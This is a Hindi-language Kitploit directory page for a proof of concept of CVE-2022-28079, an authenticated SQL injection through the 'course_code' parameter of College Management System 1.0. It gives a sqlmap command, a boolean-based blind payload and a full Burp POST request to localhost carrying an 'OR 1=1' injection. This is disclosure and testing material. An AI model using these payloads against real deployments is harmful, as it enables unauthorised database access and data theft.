Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
College-Management-System-course_code-SQL-Injection-Authenticated — CVE-2022-28079 | Kitploit
उपकरण/GitHubGitHub/erengozaydin/college-management-system-course_code-sql-injection-authenticated
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHuberengozaydin/college-management-system-course_code-sql-injection-authenticated

College-Management-System-course_code-SQL-Injection-Authenticated

CVE-2022-28079

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

कॉलेज प्रबंधन प्रणाली - 'course_code' SQL इंजेक्शन (प्रमाणित)

  1. विवरण:

कॉलेज प्रबंधन प्रणाली 1.0 /College-Management-System/admin/asign-single-student-subjects.php में पैरामीटर 'course_code' के माध्यम से SQL इंजेक्शन की अनुमति देती है। इस समस्या का शोषण करने से हमलावर एप्लिकेशन से समझौता कर सकता है, डेटा तक पहुँच या संशोधित कर सकता है, या अंतर्निहित डेटाबेस में अव्यक्त कमजोरियों का शोषण कर सकता है।

  1. प्रूफ ऑफ कॉन्सेप्ट:

Burpsuite में प्रभावित पेज से 'course_code' पैरामीटर के साथ अनुरोध को इंटरसेप्ट करें और इसे poc.req के रूप में सहेजें। फिर डेटाबेस से डेटा निकालने के लिए SQLmap चलाएँ:

sqlmap -r poc.req --dbms=mysql

  1. उदाहरण पेलोड:

boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ

  1. Burpsuite अनुरोध:

POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns

टूल डाउनलोड करें